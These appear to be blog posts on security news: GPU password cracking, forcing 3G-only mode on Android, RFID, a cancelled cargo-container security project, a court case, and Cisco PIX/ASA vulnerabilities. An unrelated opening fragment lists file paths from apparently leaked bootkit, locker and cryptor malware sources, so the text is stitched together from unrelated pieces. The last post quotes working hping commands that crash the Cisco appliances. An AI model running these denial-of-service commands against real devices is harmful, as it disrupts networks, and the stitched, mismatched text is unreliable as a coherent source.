pro\all source\temp\marazm\Droper\WhiteJoe.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Loader.exe

Stoned framework with Black Hat Europe 2007 Vipin Kumar POC, detected as Sinowal
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Stoned Bootkit Framework.zip

There is also a copy of Win32 Obfuscator known as Mystic Compressor.

adminpanel без иконки\bot_adm\cache\cryptor\CRYPTOR.EXE
pro\all source\BootkitDropper\nbuild\Tools\Mystic.exe
pro\all source\Locker\build\Tools\mystic.exe
pro\all source\test\Mystic.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\Tools\Mystic.exe

It’s just human nature the more enthusiastic someone speaks about something the more it seems to stick around in your mind. This is how I would describe a recent talk on Password Cracking given by Robert Imhoff-Dousham at Defcon this year. I won’t recap his entire presentation which you can review for yourself but I will touch on a few key points which may affect many of the current policies and practices being used out in the real world today.

“Passwords must contain 8 characters and include upper case and numbers”

This ‘rule’ is often used by many websites, corporate domains, and networking devices. But as is the case with many information security standards by the time it is adopted by the masses it is already weakened or outdated. Another point of human nature is we usually take the path of least resistance, even more so when we are dealing with something uncomfortable. For most average people this could include working on computer systems. So let’s take a closer look at this rule and how that would apply.

Let’s see Password1
While most users are hopefully wise enough not to use such an obvious word most would do the following. Use an uppercase letter as the first letter, it’s easier to remember that way since that’s the way we write. Use a number as the last character, because after all AOL only had the username “StickyBuns234” available for me.

So me as an attacker can simply modify my method of brute force to test for these specific rules, thus reducing your 8 character passwords to 6.

Well it’s brute so it would take you years to actually get this cracked right?
With the advancement of both the GPU and cloud computing markets this is no longer the case. Let’s take GPU brute forcing for example. If we take a newer 8 core GPU and use a rainbow cracking tool or a multihashing tool and pump up to 8000+ streams at the operation. Using a brute force calculator we can see that with 1 box w/4gpu’s we would require ~240 hours. Now if we spread this out across 4 boxes w/4gpu’s each we bring our time down to 2.5 days. Double the boxes and cut the time to crack in half again. Now these numbers are based on a true complex 8 character password. If users are using the flawed methods mentioned above they really have something closer to a 6 Character password depending on my table/dictionary files.

So depending on how valuable your password or passwords in general are to me. I may be able to scale a small server farm just to break user passwords (see the presentation for a cool shopping list showing a $50k 40GPU super cracking server that will eat your password up in less than 140 seconds).

Coincidentally adding just 1 or 2 characters to your required password policy can make this attack vector almost non existent again (well maybe not from the 40gpu super server).

Creating secure passwords can be as simple as coming up with a memorable phrase instead of just a word or two. Here is a great video on how to perform this task. Also remember NEVER use the same password on multiple sites, it makes it much easier to steal all your gold pieces..

Freshly back from a new round of security based conferences I will take a moment to point out one of the more interesting topics for me this time around.
The discussion on Cell Phone Spying (not that I made it inside the actual talk with the ungodly line). More specifically how by using a frequency flooding technique on 2G networks its possible to do a MiTM type of ease drop on conversations & data. You can read more about it Here

As mentioned in the article a workaround for this issue would be to disable 2G mode on GSM phones.

Here is the quick and dirty way to do this in Android (tested on rooted phone)
DISCLAIMER: Forcing 3G mode will use more battery life
Also if your not on GSM don’t try this @ home…duh

Open Dialer and Enter: *#*#4636*#*#
After inputing the number you will be prompted with a “Testing” menu
Choose “Phone Information”
Scroll all the way down “Set preferred network type” and change this setting to WCDMA_only
That’s it!

Droid 3G Only Mode

I take no credit for the fix above as it was posted on the android dev forums.
Also this protects you from this exploit and any targeting 2G only, but many other GSM insecurities still exist. Another related topic also discussed was using a TOR client to obfuscate your traffic and make yourself much more anonymous. I will cover this topic a bit more in some upcoming Android based posts.

RSA researcher Ari Juels sat down with SearchSecurity.com to discuss various topics. One of which was the constrained capabilities of RFID (like wireless bar codes), and how it affects the security posture needed to secure these devices.

But, in fact, it’s possible to shoehorn in capabilities for which these tags were not explicitly designed. For example, in RSA Labs, we proposed techniques to commandeer access control features on the tags — those are an optional security mechanism — and even the privacy feature on the tags, what’s called the “kill” function, a self-destruct feature that’s meant to protect consumer privacy. We’ve shown ways the tags can be commandeered for authentication.

Read More Here …

There is a cNet report on the director of the NSA stating

“We do not want to run cybersecurity for the U.S. government”

At least not for all the government agencies, just a select few. With all the latest high profile security breaches on government facilities the brutal honesty of the statement is understood. And it is promising to note some plans are in the works to fix the situation. We have more than enough skilled security experts in this nation, it’s about time we try to tap every resource possible to help strengthen our national cybersecurity posture.

As I suspect we may never really know the full impact some of these security breaches have had.

Read More Here …

Suffering the same fate as many other technology projects during our economic slowdown it appears the CommerceGuard project has had it operations suspended by GE. The CommerceGuard project was responsible for development of the CommerceGuard Container Security Device System (CSD) whose purpose was to track and secure shipment containers. The system was developed to meet the needs set forth by the Department of Homeland Security(DHS) which called for

a sophisticated security system within the electronics industry that can detect unauthorized breaches on all six sides of a standard cargo container or an intrusion through the door while also monitor and relay conditions inside the container such as humidity temperature and oxygen levels.

Put simply.
A more effective and secure way to track and audit who is accessing cargo containers shipped before it hits our shorelines.

Still early February of this year began to signal the beginning of the end for the project when it appeared that GE was not interested in further testing the technology. This was done just prior to a critical round of testing by DHS. Perhaps the reason for the hesitation in further testing was because the solution uses RFID technology. A technology proven long ago to be susceptible to hijacking & hacking attempts. The company sited a variety of reasons from developmental costs, speed of updated data, to maintenance costs.

A bit more on the CSD technology concept.
It uses 2 devices to monitor when ever a cargo container is opened or closed. The internal wall sensor & the door sensor work in unison to monitor and make a note of the date, time, and location of containers as they are accessed. It will also audit the amount of times this information has been queried and by whom. This process is kicked off by the shipper as they seal and virtually “Lock” their container using a hand held mobile device. This information can be referenced by receiving ports and either inspected or cleared based partly on this type of access audit. It can also be exported to various standardized data formats.

EDIT: This post was edited to correct inaccuracies on some of the details provided. Apologies for the Error..

The guys over at infowars.com made note of an interesting fight brewing up between a Boston College student backed by the EFF & a Legal firm vs. The Newton Courts, of Mass.

Fairly easy to note the ignorance of their technical staff with the following statement:

“Uses two different Operating systems to hide his illegal activity… and the other a black screen with a white console which he uses prompt commands on”

It may be safe to say their Criminal “Technical” investigations team are all fresh DeVry grads? If they would just pick up any used IT books from Amazon.com they may learn that pretty much every operating system used today allows some type of console (and this is usually black w/white text).
So this statement is basically stating using ANY operating system makes you a possible criminal who should have their computer system investigated?
So I have to ask do firewall’s and router’s fall under this umbrella theory as well? How about my managed switches?
Do I risk someone coming in and striping my network infrastructure in the interest of national security?
Since who knows I may be using my consoles to perform illegal activity like update wireless hardware to an unsupported customized firmware :GASP:

I suspect their next statement would be something along the lines of:

“The system had a web browser which allowed them to plan illegal activities so their criminal intent was obvious”

Sorry Guys Try Again!

Read More Here …

Some fairly critical issues disclosed on a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2